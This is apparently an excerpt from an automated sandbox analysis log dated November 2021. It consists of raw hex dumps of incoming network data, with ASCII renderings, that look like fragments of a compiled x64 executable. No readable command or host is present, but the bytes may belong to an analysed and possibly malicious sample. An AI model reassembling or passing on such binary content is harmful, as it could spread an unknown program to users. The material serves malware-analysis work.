                                                                                                                                                                                2021-11-11 11:26:26 UTC6598INData Raw: b6 41 01 c1 e0 08 48 63 c8 41 0f b6 41 02 48 0b c8 4c 03 c9 e9 ab 00 00 00 83 f9 5c 75 12 45 85 c0 0f 88 ac 00 00 00 49 83 c1 03 e9 94 00 00 00 83 f9 5f 75 1e 41 0f b6 49 03 41 0f b6 41 04 c1 e1 08 0b c8 41 3b c8 0f 84 86 00 00 00 49 83 c1 05 eb 71 83 f9 39 7c 2a 83 f9 3e 7e 15 83 f9 41 7e 0a 83 f9 44 7e 0b 83 f9 45 75 16 41 8a 41 03 eb 04 41 8a 41 01 3c 10 74 04 3c 0f 75 04 49 83 c1 02 48 63 c1 42 0f b6 84 10 e0 c9 09 00 4c 03 c8 85 d2 74 2f 83 f9 1c 7c 2a 83 f9 1d 7e 0a 83 f9 1e 7e 20 83 f9 2b 7f 1b 41 80 79 ff c0 72 14 41 0f b6 41 ff 83 e0 3f 42 0f b6 84 10 b0 ca 09 00 4c 03 c8 41 0f b6 09 85 c9 0f 85 29 ff ff ff 33 c0 c3 49 8b c1 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 4c 89 4c 24 20 44 89 44 24 18 55 56 57 48 83 ec 20 83 ce ff 45 8b
                                                                                                                                                                                Data Ascii: AHcAAHL\uEI_uAIAAA;Iq9|*>~A~D~EuAAAA<t<uIHcBLt/|*~~ +AyrAA?BLA)3IH\$LL$ DD$UVWH E
                                                                                                                                                                                2021-11-11 11:26:26 UTC6599INData Raw: cc cc cc cc 48 89 5c 24 08 4c 8b da 4c 8b d1 48 8d 1d be 07 06 00 41 8a 02 3c 04 72 1c 3c 05 76 66 3c 19 74 40 3c 53 74 63 3c 58 76 0c 3c 5b 76 11 3c 63 76 04 3c 68 76 53 48 8b 5c 24 08 49 8b c2 c3 45 85 c9 74 f2 41 0f b6 42 01 c1 e0 08 48 63 c8 41 0f b6 42 02 48 0b c8 4c 03 d1 41 80 3a 54 74 e4 eb 27 45 85 c0 7e 17 41 0f b6 52 01 41 8b 0b 8b c2 41 23 c8 41 23 c0 3b c1 74 03 41 89 13 49 83 c2 02 eb 8f 45 85 c9 74 ad 41 0f b6 02 0f b6 04 18 4c 03 d0 e9 7a ff ff ff cc cc cc cc cc cc cc cc 48 8b c4 44 89 48 20 4c 89 40 18 48 89 50 10 48 89 48 08 53 55 56 57 48 83 ec 48 4c 8b 11 48 8b bc 24 98 00 00 00 33 db 8b 17 4c 89 50 d0 41 80 3a 28 89 54 24 30 8b ca 89 94 24 98 00 00 00 4d 8b d8 89 5c 24 34 0f 85 3f 01 00 00 49 8d 4a 01 41 b0 3f 8a 01 41 3a c0 75 20 41
                                                                                                                                                                                Data Ascii: H\$LLHA<r<vf<t@<Stc<Xv<[v<cv<hvSH\$IEtABHcABHLA:Tt'E~ARAA#A#;tAIEtALzHDH L@HPHHSUVWHHLH$3LPA:(T$0$M\$4?IJA?A:u A
                                                                                                                                                                                2021-11-11 11:26:26 UTC6615INData Raw: 63 03 8b 06 41 b4 01 42 0f b7 14 47 8d 0c 80 8d 44 4a d0 41 8d 48 01 89 0b 48 63 c9 89 06 66 44 39 2c 4f 75 c9 8b 0e 41 8a c4 0f af cd 89 0e 48 8b 5c 24 40 48 8b 6c 24 48 48 8b 74 24 50 48 83 c4 20 41 5d 41 5c 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 38 45 33 d2 b8 00 00 00 80 3b c8 41 0f 44 ca 3b d0 41 0f 44 d2 89 4c 24 20 42 8d 04 0a 89 54 24 24 33 d2 89 44 24 2c 42 8d 04 01 48 8d 4c 24 20 89 44 24 28 ff 15 33 78 05 00 48 83 c4 38 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec 20 33 db 33 d2 33 c9 44 8d 43 08 ff 15 8e 6d 05 00 48 8b f8 48 3b c3 74 3c 48 8b c8 ff 15 75 6d 05 00 48 3b c3 74 0d 48 8b c8 ff 15 5f 6d 05 00 b3 01 eb 18 ff 15 fd 72 05 00 0f b6 db 41 bb 01 00 00 00 3d 1f 04 00 00 41 0f 44 db 48 8b cf ff 15 32
                                                                                                                                                                                Data Ascii: cABGDJAHHcfD9,OuAH\$@Hl$HHt$PH A]A\_H8E3;AD;ADL$ BT$$3D$,BHL$ D$(3xH8H\$WH 333DCmHH;t<HumH;tH_mrA=ADH2
                                                                                                                                                                                2021-11-11 11:26:26 UTC6616INData Raw: 05 00 48 83 c4 20 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec 20 49 63 d8 48 8b f9 8d 43 ff 4c 63 c0 e8 d1 6f fd ff 33 c0 66 89 44 5f fe 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc 48 89 5c 24 08 48 89 7c 24 10 48 8b 5c 24 28 41 8b f8 4c 8b 44 24 30 44 8b 1b 44 8b d2 44 3b d9 75 0f 41 39 10 75 07 32 c0 e9 99 00 00 00 44 3b d9 7d 20 8b c1 41 2b c3 99 f7 ff 85 c0 74 05 41 3b c1 7d 03 41 8b c1 41 03 c3 3b c1 0f 4f c1 89 03 eb 26 44 3b d9 7e 21 41 8b c3 2b c1 99 f7 ff 85 c0 74 05 41 3b c1 7d 03 41 8b c1 44 2b d8 44 3b d9 44 0f 4c d9 44 89 1b 41 8b 08 41 3b ca 7d 22 41 8b c2 2b c1 99 f7 ff 85 c0 74 05 41 3b c1 7d 03 41 8b c1 03 c1 41 3b c2 41 0f 4f c2 41 89 00 eb 22 7e 20 8b c1 41 2b c2 99 f7 ff 85 c0 74 05 41 3b c1 7d 03 41 8b c1 2b c8
                                                                                                                                                                                Data Ascii: H [H\$WH IcHCLco3fD_H\$0H _H\$H|$H\$(ALD$0DDD;uA9u2D;} A+tA;}AA;O&D;~!A+tA;}AD+D;DLDAA;}"A+tA;}AA;AOA"~ A+tA;}A+
                                                                                                                                                                                2021-11-11 11:26:26 UTC6632INData Raw: 84 f6 0a 00 00 83 fe 0a 0f 8f 40 05 00 00 0f 84 b6 04 00 00 83 fe 05 0f 8f 6c 02 00 00 83 fe 04 7d 5f 85 f6 0f 84 da 4a 00 00 83 ee 01 0f 84 82 0d 00 00 83 ee 01 74 33 83 fe 01 0f 85 78 0e 00 00 4c 8b db 48 89 9c 24 f0 01 00 00 e9 71 0d 00 00 4c 8b 9c 24 f0 01 00 00 e9 1b ff ff ff 44 8b 8c 24 f8 01 00 00 e9 2b ff ff ff 48 63 87 b4 00 00 00 48 03 87 80 00 00 00 48 3b d8 e9 3b 0d 00 00 85 c9 0f 84 4d 01 00 00 48 3b 9f 80 00 00 00 0f 84 a2 00 00 00 48 8d 53 ff eb 03 48 ff ca 8a 02 24 c0 3c 80 74 f5 48 3b 97 a0 00 00 00 73 07 48 89 97 a0 00 00 00 44 0f b6 02 41 81 f8 c0 00 00 00 72 58 41 8b c0 4c 8d 15 26 b9 fb ff 83 e0 3f 42 0f b6 8c 10 b0 ca 09 00 4c 8b d9 41 8b 84 8a 90 ca 09 00 44 8d 0c 49 41 ba 01 00 00 00 41 23 c0 45 03 c9 44 8b c0 41 8b c9 41 d3 e0 eb
                                                                                                                                                                                Data Ascii: @l}_Jt3xLH$qL$D$+HcHH;;MH;HSH$<tH;sHDArXAL&?BLADIAA#EDAA
                                                                                                                                                                                2021-11-11 11:26:26 UTC6633INData Raw: b6 03 83 e9 06 41 ff c9 83 e0 3f d3 e0 44 0b c0 48 ff c3 45 85 c9 7f e7 41 81 f8 00 01 00 00 0f 83 5d fe ff ff 48 8b 47 48 41 f6 04 00 04 0f 84 4e fe ff ff e9 81 00 00 00 48 3b 9f 88 00 00 00 0f 83 72 05 00 00 44 0f b6 03 48 ff c3 85 c9 74 51 41 81 f8 c0 00 00 00 72 48 41 8b c0 48 8d 15 90 b5 fb ff 83 e0 3f 44 0f b6 8c 10 b0 ca 09 00 49 8b c1 42 8b 94 8a 90 ca 09 00 43 8d 0c 49 44 23 c2 03 c9 41 d3 e0 eb 14 0f b6 03 83 e9 06 41 ff c9 83 e0 3f d3 e0 44 0b c0 48 ff c3 45 85 c9 7f e7 41 81 f8 00 01 00 00 73 0f 48 8b 47 48 41 f6 04 00 04 0f 85 c8 fd ff ff 49 ff c2 4c 89 94 24 e8 01 00 00 e9 de 3d 00 00 48 3b 9f 88 00 00 00 0f 83 e1 04 00 00 44 0f b6 03 48 ff c3 85 c9 74 51 41 81 f8 c0 00 00 00 72 48 41 8b c0 48 8d 15 ff b4 fb ff 83 e0 3f 44 0f b6 8c 10 b0 ca
                                                                                                                                                                                Data Ascii: A?DHEA]HGHANH;rDHtQArHAH?DIBCID#AA?DHEAsHGHAIL$=H;DHtQArHAH?D
                                                                                                                                                                                2021-11-11 11:26:26 UTC6649INData Raw: c8 4c 03 d1 e9 53 03 00 00 8b 84 24 20 02 00 00 44 8b 8c 24 f8 01 00 00 4c 8b 84 24 f0 01 00 00 ff c0 49 8d 52 03 48 8b cb 89 44 24 40 8b 84 24 08 02 00 00 c7 44 24 38 01 00 00 00 48 83 64 24 30 00 89 44 24 28 48 89 7c 24 20 e8 94 ba ff ff 83 f8 01 0f 84 f3 07 00 00 85 c0 74 0b 3d 1c fc ff ff 0f 85 8d 28 00 00 4c 8b 94 24 e8 01 00 00 48 63 c5 4c 03 d0 e9 e1 02 00 00 41 0f b6 4a 04 41 0f b6 42 05 c1 e1 08 0b c8 44 8d 04 09 44 3b 84 24 f8 01 00 00 7d 11 48 8b 47 10 49 63 c8 83 3c 88 00 0f 8d 95 02 00 00 83 64 24 64 00 83 fa 65 0f 85 e8 02 00 00 48 8b 6f 30 45 33 c9 41 d1 f8 44 3b 4f 28 44 89 4c 24 60 0f 8d cf 02 00 00 0f b6 4d 00 0f b6 45 01 c1 e1 08 0b c8 41 3b c8 74 10 48 63 47 2c 41 ff c1 48 03 e8 44 3b 4f 28 7c de 44 3b 4f 28 44 89 4c 24 60 0f 8d 9e 02
                                                                                                                                                                                Data Ascii: LS$ D$L$IRHD$@$D$8Hd$0D$(H|$ t=(L$HcLAJABDD;$}HGIc<d$deHo0E3AD;O(DL$`MEA;tHcG,AHD;O(|D;O(DL$`
                                                                                                                                                                                2021-11-11 11:26:26 UTC6650INData Raw: 94 24 e8 01 00 00 4c 8b 9c 24 f0 01 00 00 44 8b 8c 24 f8 01 00 00 41 0f b6 42 01 44 8b 84 24 08 02 00 00 c1 e0 08 48 63 c8 41 0f b6 42 02 48 0b c8 4c 03 d1 4c 89 94 24 e8 01 00 00 41 80 3a 54 0f 84 75 ff ff ff eb 08 4c 8b 94 24 e8 01 00 00 41 80 3a 5d 74 0a 41 80 3a 54 0f 85 22 ba ff ff 41 0f b6 42 01 c1 e0 08 48 63 c8 41 0f b6 42 02 48 0b c8 4c 03 d1 41 80 3a 54 74 e4 41 80 3a 55 44 8b 8f ac 00 00 00 48 8b 9f 98 00 00 00 44 89 8c 24 f8 01 00 00 0f 84 d2 fe ff ff 48 3b dd 0f 84 c9 fe ff ff 8b 8c 24 08 02 00 00 49 8d 72 03 80 3e 19 75 13 41 0f b6 42 04 83 e1 f8 0b c1 8b c8 89 84 24 08 02 00 00 8b 84 24 20 02 00 00 4c 8b 84 24 f0 01 00 00 ff c0 41 80 3a 57 89 44 24 40 0f 85 0d 05 00 00 83 64 24 38 00 48 8b 84 24 10 02 00 00 48 8b d6 48 89 44 24 30 89 4c 24
                                                                                                                                                                                Data Ascii: $L$D$ABD$HcABHLL$A:TuL$A:]tA:T"ABHcABHLA:TtA:UDHD$H;$Ir>uAB$$ L$A:WD$@d$8H$HHD$0L$
                                                                                                                                                                                2021-11-11 11:26:26 UTC6666INData Raw: cc cc cc cc 4c 8b dc 49 89 5b 08 49 89 73 10 57 48 83 ec 50 48 8b 8a 90 02 00 00 33 f6 49 8b f8 48 8b da 48 3b ce 0f 84 a2 00 00 00 48 8b 84 24 80 00 00 00 66 39 30 74 50 ff 82 98 02 00 00 4c 63 83 98 02 00 00 49 63 d1 c7 44 24 20 09 00 00 00 49 89 53 e8 4d 8d 4b c8 ba 3e 13 00 00 49 89 43 d8 ff 15 54 ae 04 00 8b 8b 98 02 00 00 83 c8 ff 89 8b 9c 02 00 00 c6 83 a4 02 00 00 01 66 89 87 ec 00 00 00 b0 01 eb 47 44 8b 82 a0 02 00 00 40 38 72 68 74 10 44 8b 82 9c 02 00 00 83 c8 ff 89 82 9c 02 00 00 48 8d 0d 47 9b 07 00 e8 72 fd ff ff 40 88 b3 a4 02 00 00 40 38 73 68 74 0f 48 8b 0b 33 d2 44 8d 42 01 ff 15 86 ad 04 00 32 c0 48 8b 5c 24 60 48 8b 74 24 68 48 83 c4 50 5f c3 cc cc cc cc 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 70 8b 8c 24 c8 00 00 00 b8 02 00 00 00
                                                                                                                                                                                Data Ascii: LI[IsWHPH3IHH;H$f90tPLcIcD$ ISMK>ICTfGD@8rhtDHGr@@8shtH3DB2H\$`Ht$hHP_H\$Ht$WHp$
                                                                                                                                                                                2021-11-11 11:26:26 UTC6667INData Raw: 0c f0 ba f0 ff ff ff 48 8b 09 48 8b 09 ff 15 61 a7 04 00 ba f0 ff ff ff 4c 63 c0 48 8b 05 9a 98 07 00 48 8b 0c f0 49 0f ba e8 10 48 8b 09 48 8b 09 ff 15 ed a7 04 00 48 8b 5c 24 30 48 8b 6c 24 38 48 8b 74 24 40 48 8b 7c 24 48 48 83 c4 20 41 5c c3 cc cc 40 53 48 83 ec 20 48 8b d9 48 85 d2 74 0b e8 1d 0b ff ff 89 83 b8 00 00 00 48 8b 83 a0 00 00 00 48 63 8b b8 00 00 00 48 8b 0c c8 48 8b 01 c6 80 99 00 00 00 00 c6 80 98 00 00 00 00 48 83 c4 20 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 41 54 41 55 48 83 ec 70 49 8b 88 80 00 00 00 49 8b 28 4d 8b e9 49 8b f0 4c 8b e2 48 85 c9 74 06 ff 15 aa 9e 04 00 33 c9 ff 15 1a a9 04 00 ba 5a 00 00 00 48 8b c8 48 8b d8 ff 15 39 9f 04 00 48 8b d3 33 c9 8b f8 ff 15 f4 a8 04
                                                                                                                                                                                Data Ascii: HHaLcHHIHHH\$0Hl$8Ht$@H|$HH A\@SH HHtHHcHHH [H\$Hl$Ht$WATAUHpII(MILHt3ZHH9H3
                                                                                                                                                                                2021-11-11 11:26:26 UTC6683INData Raw: 30 9c 24 d0 00 00 00 88 44 24 40 40 38 73 01 74 0f 41 32 c3 44 30 9c 24 d1 00 00 00 88 44 24 40 40 38 73 02 74 05 44 30 5c 24 41 40 38 73 03 74 05 44 30 5c 24 42 40 38 73 04 74 08 44 30 9c 24 8b 00 00 00 48 8d 4c 24 30 ff 15 45 69 04 00 bd 01 01 00 00 41 bc 01 00 00 c0 40 38 33 75 06 40 38 73 01 74 1f 0f b6 47 32 48 8b 4f 28 41 b8 10 00 00 00 c1 e0 10 8b d5 4c 63 c8 4d 0b cc ff 15 48 6a 04 00 40 38 73 02 74 1f 0f b6 47 30 48 8b 4f 28 41 b8 11 00 00 00 c1 e0 10 8b d5 4c 63 c8 4d 0b cc ff 15 23 6a 04 00 8a 43 03 40 3a c6 74 49 40 38 73 02 75 1f 40 38 77 20 75 19 0f b6 47 31 ba 05 01 00 00 c1 e0 10 4c 63 c8 b8 01 00 00 e0 4c 0b c8 eb 14 40 3a c6 74 1f 0f b6 47 31 8b d5 c1 e0 10 4c 63 c8 4d 0b cc 48 8b 4f 28 41 b8 12 00 00 00 ff 15 d2 69 04 00 40 38 73 04 0f
                                                                                                                                                                                Data Ascii: 0$D$@@8stA2D0$D$@@8stD0\$A@8stD0\$B@8stD0$HL$0EiA@83u@8stG2HO(ALcMHj@8stG0HO(ALcM#jC@:tI@8su@8w uG1LcL@:tG1LcMHO(Ai@8s
                                                                                                                                                                                2021-11-11 11:26:26 UTC6684INData Raw: 48 8b cf 48 89 74 24 20 e8 87 09 ff ff 48 8b cf e8 ef 09 ff ff 4c 8d 9c 24 30 01 00 00 49 8b 5b 10 49 8b 73 18 49 8b e3 5f c3 cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 48 81 ec 20 01 00 00 33 f6 48 8b da 48 8b f9 40 88 32 40 88 72 01 40 88 72 02 40 88 72 03 40 88 72 04 40 88 72 05 48 39 71 28 74 67 48 8d 4c 24 20 ff 15 21 65 04 00 b0 80 38 84 24 c0 00 00 00 74 06 38 44 24 30 75 09 40 38 77 1e 75 03 c6 03 01 38 84 24 c1 00 00 00 75 0a 40 38 77 1f 75 04 c6 43 01 01 38 44 24 31 75 0a 40 38 77 20 75 04 c6 43 02 01 38 44 24 32 75 0a 40 38 77 21 75 04 c6 43 03 01 38 44 24 7b 0f 85 db 00 00 00 e9 cc 00 00 00 b9 a0 00 00 00 ff 15 aa 64 04 00 bd 00 80 00 00 66 85 c5 75 10 b9 a0 00 00 00 ff 15 ad 64 04 00 66 85 c5 74 09 40 38 77
                                                                                                                                                                                Data Ascii: HHt$ HL$0I[IsI_H\$Hl$Ht$WH 3HH@2@r@r@r@r@rH9q(tgHL$ !e8$t8D$0u@8wu8$u@8wuC8D$1u@8w uC8D$2u@8w!uC8D${dfudft@8w
                                                                                                                                                                                2021-11-11 11:26:26 UTC6700INData Raw: 3b fb 75 89 8b 84 24 80 00 00 00 45 8b cc 44 8b c3 48 8b d5 49 8b cd c7 44 24 28 02 00 00 00 89 44 24 20 e8 3c 75 ff ff 8b 84 24 90 00 00 00 44 8b 8c 24 88 00 00 00 89 74 24 28 44 8b c3 89 44 24 20 e9 06 01 00 00 48 8b 85 e0 00 00 00 39 70 18 0f 88 36 ff ff ff 8b 84 24 90 00 00 00 44 8b 8c 24 88 00 00 00 8b df 83 e3 fe 48 8b d5 49 8b cd 44 8b c3 c7 44 24 28 03 00 00 00 89 44 24 20 e8 df 74 ff ff 8b 84 24 a0 00 00 00 44 8b 8c 24 98 00 00 00 44 8b c3 48 8b d5 49 8b cd 89 74 24 28 89 44 24 20 e8 ba 74 ff ff 8b 84 24 80 00 00 00 89 74 24 28 89 44 24 20 e9 89 00 00 00 8b 84 24 80 00 00 00 45 8b cc 44 8b c3 48 8b d5 49 8b cd c7 44 24 28 03 00 00 00 89 44 24 20 e8 82 74 ff ff 8b 84 24 90 00 00 00 44 8b 8c 24 88 00 00 00 44 8b c3 48 8b d5 49 8b cd 89 74 24 28 89
                                                                                                                                                                                Data Ascii: ;u$EDHID$(D$ <u$D$t$(DD$ H9p6$D$HIDD$(D$ t$D$DHIt$(D$ t$t$(D$ $EDHID$(D$ t$D$DHIt$(
                                                                                                                                                                                2021-11-11 11:26:26 UTC6701INData Raw: 4c 24 70 48 89 5c 24 60 83 fa ff 48 89 4c 24 50 48 8d 0d dd 0f 07 00 44 0f 4f c2 48 8d 54 24 70 33 db 44 89 44 24 5c 4c 8d 44 24 28 89 44 24 3c 89 5c 24 40 e8 1b 7d fe ff 4c 8d 4c 24 38 45 33 c0 ba 4d 10 00 00 48 8b ce ff 15 6d 22 04 00 4c 8b e8 83 f8 ff 0f 84 85 fe ff ff 4c 8d 0d a6 0f 07 00 4c 8d 44 24 28 48 8d 54 24 70 48 8d 0d 81 0f 07 00 e8 dc 7c fe ff 3a c3 0f 84 b8 00 00 00 41 3b ff 89 7c 24 40 0f 8f 90 00 00 00 66 39 5c 24 70 74 1f 4c 8d 4c 24 38 4d 63 c5 ba 74 10 00 00 48 8b ce ff 15 12 22 04 00 48 3b c3 0f 84 2d fe ff ff 40 f6 c5 01 74 5d 4c 8d 4c 24 70 45 33 c0 ba 57 10 00 00 48 8b ce ff 15 ed 21 04 00 48 63 ef ba 1d 10 00 00 8d 58 0c b8 96 00 00 00 4c 8b c5 3b d8 48 8b ce 0f 4f d8 45 33 c9 ff 15 c9 21 04 00 48 63 cb 48 3b c1 7f 15 44 0f b7 cb
                                                                                                                                                                                Data Ascii: L$pH\$`HL$PHDOHT$p3DD$\LD$(D$<\$@}LL$8E3MHm"LLLD$(HT$pH|:A;|$@f9\$ptLL$8MctH"H;-@t]LL$pE3WH!HcXL;HOE3!HcH;D
                                                                                                                                                                                2021-11-11 11:26:26 UTC6717INData Raw: 20 5b c3 cc 40 53 48 83 ec 20 48 8b 49 10 48 85 c9 74 16 48 8b 59 18 ba 01 00 00 00 e8 c3 ff ff ff 48 8b cb 48 85 db 75 ea 48 83 c4 20 5b c3 cc cc cc cc cc 40 53 48 83 ec 20 48 8b d9 48 83 c1 10 e8 fe 62 fb ff 48 8b c3 48 83 c4 20 5b c3 cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec 20 48 8b f9 e8 fe 68 ff ff 33 db 3a c3 75 0c 48 8b cf e8 e0 68 ff ff 3a c3 74 05 bb 01 00 00 00 8a c3 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec 20 33 ff 48 8b d9 66 39 39 0f 84 b6 00 00 00 48 8d 15 31 2d 04 00 e8 c8 d2 fb ff 3b c7 0f 84 a2 00 00 00 48 8d 15 ed 2c 04 00 48 8b cb e8 b1 d2 fb ff 3b c7 75 08 8d 47 02 e9 8c 00 00 00 48 8d 15 2a 49 04 00 48 8b cb e8 96 d2 fb ff 3b c7 75 07 b8 03 00 00 00 eb 72 48 8d 15 20 49 04 00 48 8b cb
                                                                                                                                                                                Data Ascii: [@SH HIHtHYHHuH [@SH HHbHH [H\$WH Hh3:uHh:tH\$0H _H\$WH 3Hf99H1-;H,H;uGH*IH;urH IH
                                                                                                                                                                                2021-11-11 11:26:26 UTC6718INData Raw: 00 5f c3 48 8d 4c 24 60 e8 07 6c fe ff 3a c3 0f 84 2a ff ff ff 48 8d 4c 24 60 e8 95 70 fe ff 3a c3 e9 46 ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 8b c4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 54 41 55 41 56 b8 00 11 00 00 e8 4d 6e fd ff 48 2b e0 48 8b da 48 8d 94 24 60 04 00 00 33 ff 45 8a e1 45 8a e8 40 8a f7 e8 4f b3 fb ff 48 8d 94 24 70 06 00 00 48 8b cb e8 3f b3 fb ff 48 8d 94 24 70 06 00 00 48 8d 8c 24 60 04 00 00 e8 6a 6f fe ff 48 8d 8c 24 60 04 00 00 44 8a f0 e8 0a 70 fe ff 40 3a c7 74 14 48 8d 15 fe 43 04 00 48 8d 8c 24 60 04 00 00 e8 51 cf fb ff 48 8d 8c 24 70 06 00 00 e8 e4 6f fe ff 40 3a c7 74 14 48 8d 15 d8 43 04 00 48 8d 8c 24 70 06 00 00 e8 2b cf fb ff 48 8d 84 24 f0 0e 00 00 4c 8d 8c 24 d0 0a 00 00 4c 8d 84 24 e0 0c
                                                                                                                                                                                Data Ascii: _HL$`l:*HL$`p:FHHXHhHpHx ATAUAVMnH+HH$`3EE@OH$pH?H$pH$`joH$`Dp@:tHCH$`QH$po@:tHCH$p+H$L$L$
                                                                                                                                                                                2021-11-11 11:26:26 UTC6734INData Raw: b9 5f 20 00 00 44 88 7d 00 48 ff c5 48 8b d5 e8 80 da fd ff 48 63 c8 48 03 e9 b9 00 30 00 00 44 88 7d 00 48 ff c5 48 8b d5 e8 66 da fd ff 48 63 c8 48 03 e9 48 8b 5c 24 70 4c 8b 94 24 00 02 00 00 44 8b 4c 24 78 e9 c7 fb ff ff 83 fa 12 0f 85 7c 01 00 00 41 8b d1 8b ca 41 b8 ff 00 00 00 83 e9 01 74 12 83 e9 03 74 05 83 f9 10 75 0e 41 b8 fe 00 00 00 eb 06 41 b8 fd 00 00 00 48 63 c2 ff c2 44 08 84 04 d8 00 00 00 83 fa 20 7c c9 44 8b 5c 24 7c 45 3b d9 74 9c c6 45 00 02 48 ff c5 b9 00 01 00 00 48 8b d5 41 bf 01 00 00 00 e8 e2 d9 fd ff 48 63 c8 48 03 e9 b9 7f 16 00 00 48 8b d5 e8 cf d9 fd ff 48 63 c8 48 03 e9 b9 81 16 00 00 c6 45 00 02 48 ff c5 48 8b d5 e8 b5 d9 fd ff 48 63 c8 48 03 e9 b9 0d 18 00 00 48 8b d5 e8 a2 d9 fd ff 48 63 c8 48 03 e9 b9 0f 18 00 00 c6 45
                                                                                                                                                                                Data Ascii: _ D}HHHcH0D}HHfHcHH\$pL$DL$x|AAttuAAHcD |D\$|E;tEHHAHcHHHcHEHHHcHHHcHE
                                                                                                                                                                                2021-11-11 11:26:26 UTC6735INData Raw: 89 5c 24 70 41 3b c9 75 6c 41 83 fb 5c 75 66 48 8b 84 24 f8 01 00 00 44 8b 8c 24 80 00 00 00 48 8d 4c 24 70 44 8b 40 60 49 8b d2 c7 44 24 20 01 00 00 00 e8 6c e5 fd ff 4c 8b 94 24 d8 01 00 00 45 33 c9 44 8b d8 45 39 0a 0f 85 cc 04 00 00 41 3b c1 7d 1c 83 f8 fb 75 0e 48 8b 5c 24 70 41 8d 43 0d 44 8b d8 eb 13 83 f8 ea 75 39 44 8d 58 6e 48 8b 5c 24 70 b8 08 00 00 00 44 3b de 0f 8c 27 06 00 00 74 33 b8 0d 00 00 00 44 3b d8 74 06 41 83 fb 0a 75 5d 4c 8b a4 24 f8 01 00 00 41 83 4c 24 74 20 eb 55 83 f8 ef 75 06 44 8d 58 63 eb c0 49 8b dc 48 89 5c 24 70 44 8b 5c 24 7c 45 3b d9 0f 84 6c 01 00 00 81 fe ff 00 00 00 7f 17 f6 84 24 80 00 00 00 01 0f 84 56 01 00 00 83 fe 7f 0f 8e 4d 01 00 00 41 bf 01 00 00 00 8b ce e9 2d fb ff ff 4c 8b a4 24 f8 01 00 00 44 39 4c 24 7c
                                                                                                                                                                                Data Ascii: \$pA;ulA\ufH$D$HL$pD@`ID$ lL$E3DE9A;}uH\$pACDu9DXnH\$pD;'t3D;tAu]L$AL$t UuDXcIH\$pD\$|E;l$VMA-L$D9L$|
                                                                                                                                                                                2021-11-11 11:26:26 UTC6751INData Raw: 41 89 43 20 48 8b 0b 48 8b 47 28 48 89 41 28 48 8b 03 48 8b ce 48 83 60 30 00 48 8b 03 48 83 60 38 00 48 8b 13 4c 8b 47 30 48 83 c2 30 e8 82 ff ff ff 48 8b 1b 48 8b 7f 38 48 83 c3 38 eb 8d 48 83 23 00 48 8b 74 24 38 48 8b 5c 24 30 48 83 c4 20 5f c3 cc 40 53 48 83 ec 20 4c 8b c1 48 8b d9 e8 cf d4 fa ff 84 c0 74 05 48 8b 03 eb 02 33 c0 48 83 c4 20 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 40 53 48 83 ec 20 48 83 21 00 8b 42 08 48 8b d9 89 41 08 85 c0 79 04 83 61 08 00 4c 8b 02 48 8b d1 e8 0a ff ff ff 48 8b c3 48 83 c4 20 5b c3 cc 40 53 48 83 ec 20 48 8d 05 c3 c4 03 00 48 8b d9 48 89 01 e8 98 73 ff ff 48 8b 4b 50 ff 15 16 53 03 00 48 8b 4b 58 ff 15 0c 53 03 00 48 8b 4b 10 e8 6b 47 fb ff 48 8d 4b 28 ff 15 29 51 03 00 4c 8d 1d 92 c4 03 00 4c 89 1b 48 83
                                                                                                                                                                                Data Ascii: AC HHG(HA(HHH`0HH`8HLG0H0HH8H8H#Ht$8H\$0H _@SH LHtH3H [@SH H!BHAyaLHHH [@SH HHHsHKPSHKXSHKkGHK()QLLH
                                                                                                                                                                                2021-11-11 11:26:26 UTC6752INData Raw: c0 75 1f 48 8d 0d d2 43 06 00 e8 35 d4 fd ff 4c 8b c7 48 8b d6 48 8b c8 e8 d7 ef fa ff 48 85 c0 75 19 48 8b d6 4c 8b c7 48 8d 0d 8d 43 06 00 e8 c0 ef fa ff 48 85 c0 75 02 33 db 48 8b 74 24 38 8a c3 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc cc cc cc cc 48 89 5c 24 10 48 89 4c 24 08 57 48 83 ec 20 48 8d 0d 72 43 06 00 33 db 48 8b fa 89 5c 24 30 e8 dc d3 fd ff 3a c3 75 26 48 8d 0d 59 43 06 00 e8 bc d3 fd ff 4c 8d 44 24 30 48 8b d7 48 8b c8 e8 5c ef fa ff 48 3b c3 74 05 83 c8 ff eb 1c 4c 8d 44 24 30 48 8d 0d 0e 43 06 00 48 8b d7 e8 3e ef fa ff 48 3b c3 0f 95 c3 8b c3 48 8b 5c 24 38 48 83 c4 20 5f c3 cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 57 48 81 ec c0 0a 00 00 48 8b da 48 8d 94 24 80 02 00 00 41 8a f8 e8 d0 2a fb ff 48 8d 54 24 70 48 8b cb e8 c3 2a
                                                                                                                                                                                Data Ascii: uHC5LHHHuHLHCHu3Ht$8H\$0H _H\$HL$WH HrC3H\$0:u&HYCLD$0HH\H;tLD$0HCH>H;H\$8H _H\$WHHH$A*HT$pH*
